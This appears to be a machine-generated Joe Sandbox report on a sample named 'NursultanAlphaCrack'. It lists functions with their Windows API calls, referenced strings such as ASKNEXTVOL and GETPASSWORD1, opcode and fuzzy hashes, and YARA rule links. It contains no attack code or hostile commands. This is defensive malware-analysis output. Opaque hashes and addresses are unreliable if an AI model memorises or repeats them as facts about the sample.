Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: EncodePointer_abort
String ID: MOC$RCC
API String ID: 948111806-2084237596
Opcode ID: 84c7b9166237bead998f0e3b6562ab1dda4dd6c5f7a76c40b32148d003396ee4
Instruction ID: 8bf51ba96c341bbc753fe5678f5667a3c2913cf15aabc26d48873e703de254e9
Opcode Fuzzy Hash: 84c7b9166237bead998f0e3b6562ab1dda4dd6c5f7a76c40b32148d003396ee4
Instruction Fuzzy Hash: DC414A7190068AAFCF16DF96CD85EEEBBB5FF48304F188099FA1467211D335AA90DB50

Function 001C7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C7406

Part of subcall function 001C3BBA: __EH_prolog.LIBCMT ref: 001C3BBF

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 001C74CD

Part of subcall function 001C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001C7AAB
Part of subcall function 001C7A9C: GetLastError.KERNEL32 ref: 001C7AF1
Part of subcall function 001C7A9C: CloseHandle.KERNEL32(?), ref: 001C7B00

Strings

SeSecurityPrivilege, xrefs: 001C744B
SeRestorePrivilege, xrefs: 001C7460

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 4a5a8d10b9fb3d77461075b58446bb7f0eec81fc3cbaec46553e98edb9c42e3f
Instruction ID: 74e300d1c69deb4621fe10b5d53cc027cec8122de1dfc914dea458aaca21c704
Opcode Fuzzy Hash: 4a5a8d10b9fb3d77461075b58446bb7f0eec81fc3cbaec46553e98edb9c42e3f
Instruction Fuzzy Hash: F431A371D04248AADF11EBA49C45FFE7BA9AF39304F04401AF945A72D2C7B4CA44CB61

Function 001DAD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

EndDialog.USER32(?,00000001), ref: 001DAD98
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001DADAD
SetDlgItemTextW.USER32(?,00000066,?), ref: 001DADC2

Strings

ASKNEXTVOL, xrefs: 001DAD28

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: ccf4ad0f422d29e93fac4b8300537d32d34f81e98ab28b5619265d0926643a9b
Instruction ID: ce8a38bc02434876f8b3fea335332dbb1009e80228edaf8a50abcdce910a7a95
Opcode Fuzzy Hash: ccf4ad0f422d29e93fac4b8300537d32d34f81e98ab28b5619265d0926643a9b
Instruction Fuzzy Hash: D5119632244600BFD721DFE8EC49FA6776AEF6A742F900016F241D76A1C761DA169723

Function 001CD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 001CD954
_strncpy.LIBCMT ref: 001CD99A

Part of subcall function 001D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00201030,00000200,001CD928,00000000,?,00000050,00201030), ref: 001D1DC4

Strings

$%s, xrefs: 001CD949
@%s, xrefs: 001CD93E

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: 83f71874b4aff4fd42811dcd4a86cbd282419a985cf843c4b1a503c01ede3baf
Instruction ID: c34603849f8a3d44206a6604d25f09bd5456ce0dc4aa440564d20c0b20f75c21
Opcode Fuzzy Hash: 83f71874b4aff4fd42811dcd4a86cbd282419a985cf843c4b1a503c01ede3baf
Instruction Fuzzy Hash: 5D21757644034CAEDF21DEA4DC06FEE7BE8AF25708F044526F914961A2E372D645CB51

Function 001D0E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,001CAC5A,00000008,?,00000000,?,001CD22D,?,00000000), ref: 001D0E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,001CAC5A,00000008,?,00000000,?,001CD22D,?,00000000), ref: 001D0E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,001CAC5A,00000008,?,00000000,?,001CD22D,?,00000000), ref: 001D0E9F

Strings

Thread pool initialization failed., xrefs: 001D0EB7

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 523fc07bfed4e3643daff4aa55e58c78a53a21ee8bec8a5e49a94033c91c14ba
Instruction ID: 4818dfd08089871065c2f75477ae662d3adac5c18311fb56a1db36d6fee0caf9
Opcode Fuzzy Hash: 523fc07bfed4e3643daff4aa55e58c78a53a21ee8bec8a5e49a94033c91c14ba
Instruction Fuzzy Hash: 29114FB1640708ABC3215F6A9C84AA7FBECEB69754F504C2FF1DA82200DB7199818B64

Function 001DDCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 001DDD1C, 001DDD50
RENAMEDLG, xrefs: 001DDD31

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 08251870770777a78be193ef76cfafb573d53e0dae8f72e61806b0be121d16df
Instruction ID: b39131dbf7db3ab43160a8cb351a473bc65d77f1477c22403514ff3a21f8835a
Opcode Fuzzy Hash: 08251870770777a78be193ef76cfafb573d53e0dae8f72e61806b0be121d16df
Instruction Fuzzy Hash: 7F017176604749AFDF158FA4FC48AAB7BAAF708354B114427F94593372CB319860DBE0

Function 001E9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001E9AA9
__alldvrm.LIBCMT ref: 001E9CAA
__alldvrm.LIBCMT ref: 001E9CCC

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: a55cb4ac0c8f25c8ab0bbb7f340712d352e08fc12181aef969fd040d5b5d60dc
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: D4A16B72900BC69FDB25DF1AC8917BEBBE5EF65310F2441ADE5459B281C3748D41C750

Function 001CA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,001C7F69,?,?,?), ref: 001CA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,001C7F69,?), ref: 001CA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,001C7F69,?,?,?,?,?,?,?), ref: 001CA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,001C7F69,?,?,?,?,?,?,?,?,?,?), ref: 001CA4C6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 2e8aa35a86762e570055cfa64c266891d56163dc1289b1fab945b05919b30462
Instruction ID: efb9f4923c315337d13613ea9cddbf722364f0dc196ad5b0d2ff7c522ea982f8
Opcode Fuzzy Hash: 2e8aa35a86762e570055cfa64c266891d56163dc1289b1fab945b05919b30462
Instruction Fuzzy Hash: 8741C031248385AAD736DF24DC55FAEBBE4AFA4308F48091DB6E1D3180D7A4DA48DB53

Function 001C1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001C112B
_wcslen.LIBCMT ref: 001C1153
_wcslen.LIBCMT ref: 001C1182
_wcslen.LIBCMT ref: 001C11A9

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 438ed003daaf24662782342245bb800e6b491acbc1022be397b3bab7d89fe13c
Instruction ID: 9245faeb7e45289ac4ec63e2f3f45d00181fc142b1f9d7512f31e603e49320cf
Opcode Fuzzy Hash: 438ed003daaf24662782342245bb800e6b491acbc1022be397b3bab7d89fe13c
Instruction Fuzzy Hash: 4741B671940669ABCB25DFA88C09AEE7BB8EF15311F14401EFD45F7242DB34EE458AA0

Function 001EC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001E91E0,?,00000000,?,00000001,?,?,00000001,001E91E0,?), ref: 001EC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001ECA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001E6CBE,?), ref: 001ECA70
__freea.LIBCMT ref: 001ECA79

Part of subcall function 001E8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ae3bc448bbef1abf6b9e34132e6abe6daab58b79db3abc9494401c30be1d02ab
Instruction ID: a1c43f7c505115a5d72963b642cd1c4e6694c6a832dfad46f1eb9a46e4266f86
Opcode Fuzzy Hash: ae3bc448bbef1abf6b9e34132e6abe6daab58b79db3abc9494401c30be1d02ab
Instruction Fuzzy Hash: D731CD32A0064AABDB24DF66CC45DBE7BA5EB81310B044228FC15E7250EB35CD92CBD0

Function 001DA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001DA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 001DA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001DA683
ReleaseDC.USER32(00000000,00000000), ref: 001DA691

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 92679777c3d6cf4682dbcec768fffe4bc0f4cb1161a6ebf207608afa603aa565
Instruction ID: 97ee6e69dfe2cd03376abc9a4450286e26dc151dc427f9e09ddd7d49567f6c58
Opcode Fuzzy Hash: 92679777c3d6cf4682dbcec768fffe4bc0f4cb1161a6ebf207608afa603aa565
Instruction Fuzzy Hash: CDE0EC31942B21B7D2719BA0BC4DB8B3E54AB05B62F011101FB0596190DF6887018BB5

Function 001DA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 001DA699: GetDC.USER32(00000000), ref: 001DA69D
Part of subcall function 001DA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001DA6A8
Part of subcall function 001DA699: ReleaseDC.USER32(00000000,00000000), ref: 001DA6B3

GetObjectW.GDI32(?,00000018,?), ref: 001DA83C

Part of subcall function 001DAAC9: GetDC.USER32(00000000), ref: 001DAAD2
Part of subcall function 001DAAC9: GetObjectW.GDI32(?,00000018,?), ref: 001DAB01
Part of subcall function 001DAAC9: ReleaseDC.USER32(00000000,?), ref: 001DAB99

Strings

(, xrefs: 001DA9AA

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: c6e8ed7edebdb78d4f79dc8fb5412f1bfc676a7122f9dd3a98b11654aae3ac72
Instruction ID: 515ff2e39732def662d5957db523ebf2c42568129221cd9d3bd2ccb51eb4a2df
Opcode Fuzzy Hash: c6e8ed7edebdb78d4f79dc8fb5412f1bfc676a7122f9dd3a98b11654aae3ac72
Instruction Fuzzy Hash: D891E271608354AFD721DF25D84892BBBE9FFC9700F00491EF99AD3260DB30A946CB62

Function 001EB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001EB324

Part of subcall function 001E9097: IsProcessorFeaturePresent.KERNEL32(00000017,001E9086,00000050,001F3A34,?,001CD710,00000004,00201030,?,?,001E9093,00000000,00000000,00000000,00000000,00000000), ref: 001E9099
Part of subcall function 001E9097: GetCurrentProcess.KERNEL32(C0000417,001F3A34,00000050,00201030), ref: 001E90BB
Part of subcall function 001E9097: TerminateProcess.KERNEL32(00000000), ref: 001E90C2

Strings

*?, xrefs: 001EB1FB
., xrefs: 001EB4DB

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: e3c82e1c070e813c388922f59460cad5451a47acc6c9aac80a3c397cb8b5de91
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: D3519071E0464AAFDF14DFAAC881AAEBBB5FF58310F244169E954E7340E735AE01CB50

Function 001C75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C75E3

Part of subcall function 001D05DA: _wcslen.LIBCMT ref: 001D05E0

Part of subcall function 001CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001CA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001C777F

Part of subcall function 001CA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA501
Part of subcall function 001CA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001CA325,?,?,?,001CA175,?,00000001,00000000,?,?), ref: 001CA532

Strings

:, xrefs: 001C7654

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 1bed97c80ec5656039a63d2453fd6eb87243cd99ff100f19e6a52782872da29f
Instruction ID: 699f904bb74f05090f3169edd01dcb017fc56814048814ba277688f7d81f387f
Opcode Fuzzy Hash: 1bed97c80ec5656039a63d2453fd6eb87243cd99ff100f19e6a52782872da29f
Instruction Fuzzy Hash: 97416471800258A9EB25EB64CC5AFEEB37CAF75300F40409AB605A7192DB749F85CF71

Function 001DB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001DB4E3
_wcslen.LIBCMT ref: 001DB4FE

Strings

}, xrefs: 001DB4D6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 031de28fcb3a251b013047d51d8e8e851fb1065ad5298f43c7cb69bf997b2b38
Instruction ID: 5f3b45932d43f96ef03088f496dd4dde9d08701a7e248de3fbda7abc3edb0496
Opcode Fuzzy Hash: 031de28fcb3a251b013047d51d8e8e851fb1065ad5298f43c7cb69bf997b2b38
Instruction Fuzzy Hash: FF2108729093569AD731EA64E885F6FB3ECDF61750F02042BF542C3341E764DD4883A2

Function 001DDDA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010440,001DB270,?,?), ref: 001DDE18

Strings

GETPASSWORD1, xrefs: 001DDE0D
xz!, xrefs: 001DDE28

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xz!
API String ID: 665744214-1603523493
Opcode ID: 1ee91e08fb369ef9e5b9aa41d4a02b0279e270d94ea5594a589b2d86a66cdf95
Instruction ID: bafe8238205f1e36a49225e3a762fc5df78b6489642d92567e7ef4bdc1e54511
Opcode Fuzzy Hash: 1ee91e08fb369ef9e5b9aa41d4a02b0279e270d94ea5594a589b2d86a66cdf95
Instruction Fuzzy Hash: A2113B72204244AADF21DA34BC05BAF3798AB15311F144035FE45AB1C1C7B4AD84C764

Function 001CF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

